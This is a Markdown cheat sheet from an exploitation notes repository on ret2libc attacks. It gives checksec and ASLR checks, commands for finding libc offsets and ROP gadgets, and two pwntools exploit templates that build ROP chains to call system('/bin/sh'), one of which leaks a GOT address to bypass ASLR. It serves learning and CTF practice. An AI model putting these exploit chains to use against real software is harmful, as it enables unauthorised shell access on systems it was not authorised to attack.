killchain-compendium/exploit/binaries/ret2libc.md

131 lines
2.7 KiB
Markdown
Raw Normal View History

2021-12-12 00:54:07 +01:00
# Ret2libc
2022-02-07 23:37:05 +01:00
* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
2022-01-27 00:43:24 +01:00
* Check binary via
* `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
* `file`
* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space`
* Off = 0
* Partial = 1
* Full = 2
* `got` contains dynamically loaded functions
* `plt` contains used loaded dynamical functions
2021-12-12 00:54:07 +01:00
2022-01-27 00:43:24 +01:00
## Finding something to execute
* Interesting stuff to call from inside libc
* `/bin/sh`
* `system`
2021-12-12 00:54:07 +01:00
2022-01-27 00:43:24 +01:00
## libc -- Finding Offsets
2022-05-05 09:31:18 +02:00
* Find libc address at runtime via gbd
```sh
info sharedlibrary
```
2022-01-27 00:43:24 +01:00
### Manually
2021-12-12 00:54:07 +01:00
* On target find `sh` address inside libc
```sh
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
```
* Sub from `system` address from inside libc
```sh
readelf -s /lib32/libc.so.6 | grep system
```
2022-01-27 00:43:24 +01:00
### Measure the Buffer
* With gef
2022-03-19 23:39:17 +01:00
* `pattern create`
2022-01-27 00:43:24 +01:00
* `run`
* Use pattern
* `pattern search $<register>`
## ROP -- Creating a Chain
* Creating a ROP chain to execute the `/bin/sh` with parameters
* Check
* Architecture
* Calling convention
2022-02-03 22:46:56 +01:00
### Manually
```sh
ROPgadget --binary <file> | grep rdi
```
* Find `ret`s, to put in front of rdi
```sh
objdump -d <file> | grep ret
```
2022-03-19 23:39:17 +01:00
## Automated
* [xct's ropstar](https://github.com/xct/ropstar.git)
2022-02-03 22:46:56 +01:00
## Example without ASLR
```python
from pwn import *
p = process('<binary>')
cbase = 0x<libc_base>
sys = cbase + <libc_system>
sh = cbase + <libc_shell>
rop_rdi = <found rop rdi>
rop_ret = <found rop ret>
payload = b'A' * <count>
payload += b'B' * 8
payload += p64(rop_ret)
payload += p64(rop_rdi)
payload += p64(sh)
payload += p64(system)
payload += p64(0x0) # end payload
p.recv()
p.sendline(payload)
p.interactive()
```
## Example with ASLR
2022-01-27 00:43:24 +01:00
* Create context
```python
#!/usr/bin/env python3
from pwn import *
context.binary = binary = '<binary>'
elf = ELF(binary)
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = process()
# ROP I, needed when ASL is enabled
payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets)
payload += p64(elf.plt.puts)
payload += p64(elf.symbols.main)
p.recvline()
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement
p.recvline()
log.info(f"gets: {hex(leak)}")
libc.address = leak - libc.symbols.gets
log.info(f"libc address: {hex(libc.address)}") # start address should be aligned
# ROP II
payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(rop.find_gadget(['ret'])[0])
payload += p64(libc.symbols.system)
p.sendline(payload)
p.recvline()
p.interactive()
```